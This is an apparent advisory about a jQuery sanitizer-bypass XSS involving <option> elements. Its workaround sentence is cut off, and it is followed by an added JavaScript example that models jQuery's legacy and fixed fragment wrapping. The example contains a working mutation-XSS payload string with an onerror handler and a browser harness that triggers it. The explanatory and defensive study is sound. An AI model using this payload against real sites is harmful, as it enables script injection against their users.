CVSS v3.x: 6.9 (Medium)
- >= 4.4.0
Passing HTML containing <option> elements from untrusted sources, even after sanitizing them, to one of jQuery's DOM manipulation methods (e.g. .append() and others) may execute untrusted code. The sanitizer parses the string in one context, but jQuery re-parses it in another, so markup the sanitizer saw only as text can become live elements.
To work around this issue without upgrading, use DOMPurify with its SAFE_FOR_JQUERY option to sanitize the HTML string before passing it to a
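The following is an added example, not code from the advisory, from jQuery or from DOMPurify. It models, as a plain string transform, how jQuery before 3.5.0 built a DOM fragment from an HTML string (the wrapper prefix/suffix chosen from the first tag name) next to the 3.5.0 behaviour on a modern browser, so the context change behind the <option> problem can be inspected without a browser. The function names, the `hitsLegacyOptionWrapper` audit helper and the payload string are constructed for this example; Node 14+ is assumed for the string part, and the browser part is skipped where there is no `document`.

```javascript
// Added example (not jQuery's or DOMPurify's code): string-level model of the
// fragment-building step in jQuery < 3.5.0 versus >= 3.5.0.

// Same regex jQuery uses to pick the first tag name in an HTML string.
const RTAG_NAME = /<([a-z][^\/\0>\x20\t\r\n\f]*)/i;

// jQuery < 3.5.0 wrapMap. The option/optgroup entry is the problem: the caller's
// HTML is re-parsed inside a <select>, a context the sanitizer never saw.
const WRAP_MAP_LEGACY = {
  option: [1, "<select multiple='multiple'>", "</select>"],
  thead: [1, "<table>", "</table>"],
  col: [2, "<table><colgroup>", "</colgroup></table>"],
  tr: [2, "<table><tbody>", "</tbody></table>"],
  td: [3, "<table><tbody><tr>", "</tr></tbody></table>"],
  _default: [0, "", ""],
};
WRAP_MAP_LEGACY.optgroup = WRAP_MAP_LEGACY.option;
WRAP_MAP_LEGACY.tbody = WRAP_MAP_LEGACY.tfoot = WRAP_MAP_LEGACY.colgroup =
  WRAP_MAP_LEGACY.caption = WRAP_MAP_LEGACY.thead;
WRAP_MAP_LEGACY.th = WRAP_MAP_LEGACY.td;

// jQuery >= 3.5.0 on a browser that can parse <option> directly inside a <div>:
// the table wrappers stay (tr/td are still stripped otherwise), the <select>
// wrapper is gone.
const WRAP_MAP_FIXED = { ...WRAP_MAP_LEGACY };
delete WRAP_MAP_FIXED.option;
delete WRAP_MAP_FIXED.optgroup;

function firstTagName(html) {
  return (RTAG_NAME.exec(html) || ["", ""])[1].toLowerCase();
}

// The string that actually reaches tmp.innerHTML for a given wrapMap.
// (jQuery < 3.5.0 also ran htmlPrefilter on the input; it rewrites only
// self-closing tags and leaves the payload below unchanged, so it is omitted.)
function wrapForInnerHTML(html, wrapMap) {
  const wrap = wrapMap[firstTagName(html)] || wrapMap._default;
  return wrap[1] + html + wrap[2];
}

const legacyJqueryWrap = (html) => wrapForInnerHTML(html, WRAP_MAP_LEGACY);
const fixedJqueryWrap = (html) => wrapForInnerHTML(html, WRAP_MAP_FIXED);

// Constructed payload of the shape the advisory describes. Parsed on its own,
// as a sanitizer does, everything between <style> and </style> is raw text, so
// no <img> element and no onerror attribute ever exists for the sanitizer to
// strip. Parsed inside <select>, the HTML parser's "in select" insertion mode
// ignores the <style> start tag, </option> and </select> then close the
// wrapper, and the same bytes are parsed as a real <img> with an event handler.
const PAYLOAD =
  "<option><style></option></select><img src=x onerror=alert(1)></style>";

// Cheap audit check for strings flowing into .append() and the other DOM
// manipulation methods on jQuery < 3.5.0: does the legacy <select> wrapper apply?
function hitsLegacyOptionWrapper(html) {
  const tag = firstTagName(html);
  return tag === "option" || tag === "optgroup";
}

// Browser-only: count <img> elements the parser produces from a wrapped string.
// Returns null under Node (no DOM). Run it only in a throwaway page, because
// the onerror handler fires when the <img> is created.
function countImgElements(wrappedHtml) {
  if (typeof document === "undefined") return null;
  const tmp = document.createElement("div");
  tmp.innerHTML = wrappedHtml;
  return tmp.querySelectorAll("img").length;
}

console.log("legacy innerHTML:", legacyJqueryWrap(PAYLOAD));
console.log("fixed innerHTML: ", fixedJqueryWrap(PAYLOAD));
if (typeof document !== "undefined") {
  console.log("img elements, legacy:", countImgElements(legacyJqueryWrap(PAYLOAD)));
  console.log("img elements, fixed: ", countImgElements(fixedJqueryWrap(PAYLOAD)));
}
```

Under Node the script prints the two innerHTML strings; loaded in a browser page it also shows that the legacy string yields an <img> element while the 3.5.0 string yields none. This is why sanitizing the string before handing it to jQuery is not enough on its own: the sanitizer and the browser disagree about which bytes are markup once jQuery changes the parsing context.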